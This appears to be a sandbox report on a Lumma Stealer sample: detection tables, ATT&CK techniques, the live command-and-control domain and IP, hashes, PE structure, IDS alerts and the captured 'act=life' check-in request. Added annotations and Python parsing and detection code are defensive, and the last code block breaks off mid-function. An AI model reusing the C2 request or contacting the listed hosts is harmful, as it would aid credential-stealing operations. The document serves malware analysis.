Execution: 1 Scheduled Task/Job; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 3 Virtualization/Sandbox Evasion; 1 Disable or Modify Tools; 11 Process Injection; 111 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 211 Security Software Discovery; 3 Virtualization/Sandbox Evasion; 1 Process Discovery; 12 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 11 Archive Collected Data; 2 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
3vLKNycnrz.exe | 57% | Virustotal |
3vLKNycnrz.exe | 53% | ReversingLabs | Win32.Trojan.Lumma
3vLKNycnrz.exe | 100% | Joe Sandbox ML |

No Antivirus matches (dropped files, unpacked PE files, domains)

Source | Detection | Scanner | Label
https://peelyitemsn.click/api | 0% | Avira URL Cloud | safe
https://peelyitemsn.click/C | 0% | Avira URL Cloud | safe
https://peelyitemsn.click/api6 | 0% | Avira URL Cloud | safe
https://peelyitemsn.click/ | 0% | Avira URL Cloud | safe
https://peelyitemsn.click/. | 0% | Avira URL Cloud | safe
peelyitemsn.click | 0% | Avira URL Cloud | safe
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
peelyitemsn.click | 104.21.62.151 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://peelyitemsn.click/api | true | Avira URL Cloud: safe | unknown
sordid-snaked.cyou | false | | high
diffuculttan.xyz | false | | high
effecterectz.xyz | false | | high
peelyitemsn.click | true | Avira URL Cloud: safe | unknown
awake-weaves.cyou | false | | high
immureprech.biz | false | | high
wrathful-jammy.cyou | false | | high
deafeninggeh.biz | false | | high
debonairnukk.xyz | false | | high

URLs found in memory or binary data

Name | Source | Malicious | Antivirus Detection | Reputation
https://peelyitemsn.click/C | 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-neti | 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://peelyitemsn.click/api6 | 3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-net | 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://peelyitemsn.click/ | 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://peelyitemsn.click/. | 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.62.151 | peelyitemsn.click | United States | 13335 | CLOUDFLARENET US | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581190
Start date and time: 2024-12-27 08:12:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3vLKNycnrz.exe (renamed because original name is a hash value)
Original Sample Name: 78b4d3e1df367155161b0ca24d08b157.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 95
• Number of non-executed functions: 76
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
02:13:07 | API Interceptor | 1x Sleep call for process: 3vLKNycnrz.exe modified
IP context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.62.151 | appbase.dll | malicious | Unknown |
104.21.62.151 | Xerox-6509.dll | malicious | Unknown |

Domain context: No context

ASN context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | installer.bat | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | skript.bat | malicious | Vidar | 162.159.61.3
CLOUDFLARENETUS | din.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | lem.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | markiz.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
CLOUDFLARENETUS | utkin.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
CLOUDFLARENETUS | 0Gs0WEGB1E.dll | malicious | Unknown | 104.21.22.88
CLOUDFLARENETUS | Bootstrapper.exe | malicious | LummaC | 104.21.80.1
CLOUDFLARENETUS | NewI Upd v1.1.0.exe | malicious | LummaC | 172.67.190.223
CLOUDFLARENETUS | setup.exe | malicious | LummaC | 172.67.197.192

JA3 fingerprint context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Bootstrapper.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | NewI Upd v1.1.0.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | exlauncher-unpadded.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | atw3.dll | malicious | Gozi, Ursnif | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | installer_1.05_36.4.zip | malicious | NetSupport RAT, LummaC, LummaC Stealer | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | 0zBsv1tnt4.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | cqHMm0ykDG.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | pVbAZEFIpI.exe | malicious | LummaC | 104.21.62.151
a0e9f5d64349fb13191bc781f81f42e1 | GxX48twWHA.exe | malicious | LummaC | 104.21.62.151

Dropped files context: No context

No created / dropped files found
Static File Info

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.807765755196678
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: 3vLKNycnrz.exe
File size: 3'635'712 bytes
MD5: 78b4d3e1df367155161b0ca24d08b157
SHA1: e0b63eb3c6858c7cb8e3754b67264b8a861b1d86
SHA256: 10c9f5d51b36a62a32560a1e9912a28c781f9723fa23c2f778a86e8e94aef2fb
SHA512: d78bbd14cfd7b6af5f13e8d40072963d36a2d9059e586d3837e476f25d458056d44ff3a25713139f83d7f550861c213dc9ac7a1e18335069f10d656380ed4a06
SSDEEP: 98304:E3CrFD9UPyyHBhwPFiVupq1ME+2KPv193iD:E38B948FB6M2KHji
TLSH: A2F5F1B4AFEC9FC4E77C667EC3E128355139905818B7E32729485ABC0549BB0E38D61E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................p7...........7.. ........@.. ........................7...........`................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x778dfe
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6761321C [Tue Dec 17 08:11:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Entrypoint disassembly

Instruction
jmp dword ptr [00402000h]
aaa
test dword ptr [ecx], ebx
rol byte ptr [eax], 1
add byte ptr [eax], al
(the last instruction is repeated 94 times in the original listing: it is the disassembly of consecutive 00 00 byte pairs, i.e. the zero padding that follows the stub. The leading indirect jmp through the import address table is the usual native entry stub of a .NET executable; the managed code is entered via the CLR loader, not via the bytes shown here.)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x378dac         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x37a000         0x600         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x37c000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
A populated COM_DESCRIPTOR entry is the CLR header (IMAGE_COR20_HEADER is 0x48 bytes), so the file is a managed .NET executable; the 8-byte IAT is the single slot such an image needs for mscoree.dll!_CorExeMain. SECURITY is empty, so the file carries no Authenticode signature.
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity  File Type  Entropy              Characteristics
.text   0x2000           0x376e08      0x377000  2c7f957da1b8f2dbce38b2a8835b1272  unknown   unknown          unknown    unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x37a000         0x600         0x600     9edb7b38ba1086eb179db3a2760060de  False     0.408203125      data       3.986737529851491    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x37c000         0xc           0x200     4304d922d1d1d01b3bcd855cce4612af  False     0.041015625      data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.text accounts for 0x377000 of the 3'635'712 (0x377a00) file bytes; the remaining 0xa00 are the 0x200-byte headers plus the .rsrc and .reloc raw data. In a .NET image the managed metadata and embedded resources live in .text, which is where Costura-embedded assemblies would be stored. Entropy and ZLIB complexity are reported as unknown for exactly that section, so this table offers no packing signal for the part of the file that matters.
Name         RVA       Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x37a0a0  0x2ec  data                                                                                                   0.4344919786096257
RT_MANIFEST  0x37a38c  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
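To make the two static tables above concrete, here is an added example (my code, not Joe Sandbox's and not the sample's) that reads the data directories and section table from raw PE bytes, computes the per-section Shannon entropy the report lists, and applies the two triage checks those fields support: is the COM_DESCRIPTOR (CLR header) directory populated, and is the SECURITY directory empty. The parser is generic; the fixture it parses is a constructed three-section PE32 image that only mimics the report's layout (IAT at 0x2000, CLR header at 0x2008, .text/.rsrc/.reloc) and is not the sample's bytes.

```python
"""PE32 data-directory / section-table reader with per-section entropy.

Added example; not code from Joe Sandbox or from the analysed sample. The
fixture built by build_sample_pe() is constructed here and only mimics the
report's layout (IAT at 0x2000, CLR header at 0x2008, .text/.rsrc/.reloc).
"""
import struct
from collections import Counter
from math import log2

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Return machine type, the 16 data directories and the section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    # NumberOfRvaAndSizes is at +92 for PE32 (0x10b) and +108 for PE32+ (0x20b).
    ndirs_off = opt + (92 if magic == 0x10B else 108)
    ndirs = struct.unpack_from("<I", image, ndirs_off)[0]
    dirs = {}
    for i in range(min(ndirs, 16)):
        dirs[DIRECTORY_NAMES[i]] = struct.unpack_from("<II", image, ndirs_off + 4 + 8 * i)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        raw = image[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": round(shannon_entropy(raw), 3),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return {"machine": machine, "directories": dirs, "sections": sections}


def is_managed(pe: dict) -> bool:
    """A populated COM_DESCRIPTOR directory is the CLR header (IMAGE_COR20_HEADER, 0x48 bytes)."""
    rva, size = pe["directories"].get("COM_DESCRIPTOR", (0, 0))
    return rva != 0 and size >= 0x48


def is_signed(pe: dict) -> bool:
    """SECURITY points at the Authenticode certificate table; empty means unsigned."""
    return pe["directories"].get("SECURITY", (0, 0))[1] != 0


def build_sample_pe() -> bytes:
    """Constructed PE32 fixture: three sections, IAT + CLR header directories, no signature."""
    sections = [  # (name, raw data, characteristics)
        (b".text", bytes(range(256)) * 4, 0x60000020),    # CODE | EXECUTE | READ
        (b".rsrc", b"A" * 256 + b"B" * 256, 0x40000040),  # INITIALIZED_DATA | READ
        (b".reloc", b"\0" * 512, 0x42000040),             # INITIALIZED_DATA | DISCARDABLE | READ
    ]
    hdr_size, raw_ptr, va = 0x200, 0x200, 0x2000
    sec_hdrs, blobs = b"", b""
    for name, data, chars in sections:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                                len(data), raw_ptr, 0, 0, 0, 0, chars)
        blobs += data
        raw_ptr += len(data)
        va += 0x2000
    dirs = [(0, 0)] * 16
    dirs[12] = (0x2000, 0x8)      # IAT: one slot, as for a single mscoree import
    dirs[14] = (0x2008, 0x48)     # COM_DESCRIPTOR: CLR header right after the IAT
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, 0, 0, 0, 0x2000, 0x2000, 0x4000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x2000, 0x200, 4, 0, 0, 0, 6, 0,
                       0, 0x8000, hdr_size, 0, 3, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    return (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(hdr_size, b"\0") + blobs
```

Run `parse_pe(open(path, "rb").read())` on a real file to get the same fields the report tabulates; `is_managed` and `is_signed` reproduce the conclusions drawn above from the directory table. The CLR-header check relies on a non-zero COM_DESCRIPTOR directory, which is how the Windows loader itself decides to hand the image to mscoree.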
Timestamp                        SID      Signature                                                  Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2024-12-27T08:13:07.399283+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.8  49706        104.21.62.151  443        TCP
2024-12-27T08:13:08.134997+0100  2049836  ET MALWARE Lumma Stealer Related Activity                  1         192.168.2.8  49706        104.21.62.151  443        TCP
2024-12-27T08:13:08.134997+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.8  49706        104.21.62.151  443        TCP
2024-12-27T08:13:09.017586+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.8  49707        104.21.62.151  443        TCP
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 27, 2024 08:13:05.765031099 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:05.765065908 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:05.765147924 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:05.771680117 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:05.771692038 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:07.399205923 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:07.399282932 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:07.402235985 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:07.402241945 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:07.402578115 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:07.446098089 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:07.455682039 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:07.455781937 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:07.455791950 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:08.134979010 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:08.135082006 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:08.135171890 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:08.137268066 CET  49706        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:08.137281895 CET  443          49706      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:08.148371935 CET  49707        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:08.148425102 CET  443          49707      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:08.148494959 CET  49707        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:08.148742914 CET  49707        443        192.168.2.8    104.21.62.151
Dec 27, 2024 08:13:08.148761988 CET  443          49707      104.21.62.151  192.168.2.8
Dec 27, 2024 08:13:09.017585993 CET  49707        443        192.168.2.8    104.21.62.151
Two TLS connections to 104.21.62.151:443: source port 49706 carries the check-in whose decrypted content is listed under session 0 below, and 49707 opens 13 ms after that response arrives; no decrypted content for the second connection appears in this report.
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 27, 2024 08:13:05.187879086 CET  51779        53         192.168.2.8  1.1.1.1
Dec 27, 2024 08:13:05.507018089 CET  53           51779      1.1.1.1      192.168.2.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name               Type            Class        DNS over HTTPS
Dec 27, 2024 08:13:05.187879086 CET  192.168.2.8  1.1.1.1  0xecf     Standard query (0)  peelyitemsn.click  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name               CName  Address         Type            Class        DNS over HTTPS
Dec 27, 2024 08:13:05.507018089 CET  1.1.1.1    192.168.2.8  0xecf     No error (0)  peelyitemsn.click  -      104.21.62.151   A (IP address)  IN (0x0001)  false
Dec 27, 2024 08:13:05.507018089 CET  1.1.1.1    192.168.2.8  0xecf     No error (0)  peelyitemsn.click  -      172.67.136.183  A (IP address)  IN (0x0001)  false
                                                        • peelyitemsn.click
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49706        104.21.62.151   443               7452  C:\Users\user\Desktop\3vLKNycnrz.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-27 07:13:07 UTC  264                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: peelyitemsn.click
2024-12-27 07:13:07 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                                       Data Ascii: act=life
2024-12-27 07:13:08 UTC  1132               IN         HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:13:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bkeu8p46g8asfgmahjtgh0o5m2; expires=Tue, 22 Apr 2025 00:59:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uw%2FRRdMdeQWGANOH1CqeikSMujYeiosfNhdEJmYdKGqQUaPHPtRF4zFOO%2BWDS9%2BqyicB7doA2yjZfLHax2M3TlCcK8m%2FAmkU00MuMjFqT1175HGiIyqmT644oU5LGyRIUGL73g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f878196ff9841c6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1698&rtt_var=647&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1678160&cwnd=204&unsent_bytes=0&cid=eed846db26c4af20&ts=1110&x=0"
2024-12-27 07:13:08 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                       Data Ascii: 2\r\nok\r\n  (chunk-size line "2", then the 2-byte chunk "ok")
2024-12-27 07:13:08 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                       Data Ascii: 0\r\n\r\n  (zero-length chunk ending the chunked body, which decodes to "ok")
This is the Lumma check-in: a 264-byte header block for POST /api followed by the 8-byte form body act=life, acknowledged with a chunked "ok" and Connection: close. The server is a PHP application (PHPSESSID cookie) behind Cloudflare (Server: cloudflare, CF-RAY), so the two A records resolved above are shared proxy front-ends; the domain and this request shape are the durable indicators. The two ET MALWARE Lumma alerts are stamped 08:13:08.134997 CET, the instant this response (07:13:08 UTC) arrived.
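The check-in above is small enough to reproduce end to end. As an added example (my code, not Joe Sandbox's and not the malware's), the block below parses the captured request and response, decodes the chunked body and applies a narrow heuristic for this exchange. REQUEST and RESPONSE are reconstructed from the listing above (the response keeps only the headers needed for decoding); the decision rule in classify_checkin is my assumption for illustration, not a published signature.

```python
"""Detect the Lumma 'act=life' check-in in a captured HTTP exchange.

Added example; not Joe Sandbox's code and not the sample's. REQUEST and RESPONSE
are reconstructed from the report's HTTP listing (response headers trimmed to
the ones that matter for decoding); the heuristic in classify_checkin() is an
assumption for illustration, not a published signature.
"""
from urllib.parse import parse_qs

REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\n"
    b"Host: peelyitemsn.click\r\n"
    b"\r\n"
    b"act=life"                      # 61 63 74 3d 6c 69 66 65
)

RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n"
    b"Server: cloudflare\r\n"
    b"\r\n"
    b"2\r\nok\r\n"                   # 32 0d 0a 6f 6b 0d 0a: 2-byte chunk "ok"
    b"0\r\n\r\n"                     # 30 0d 0a 0d 0a: terminating chunk
)


def parse_http(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body up to the zero-length chunk."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk header")
        size = int(body[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        if size == 0:
            return bytes(out)
        pos = eol + 2
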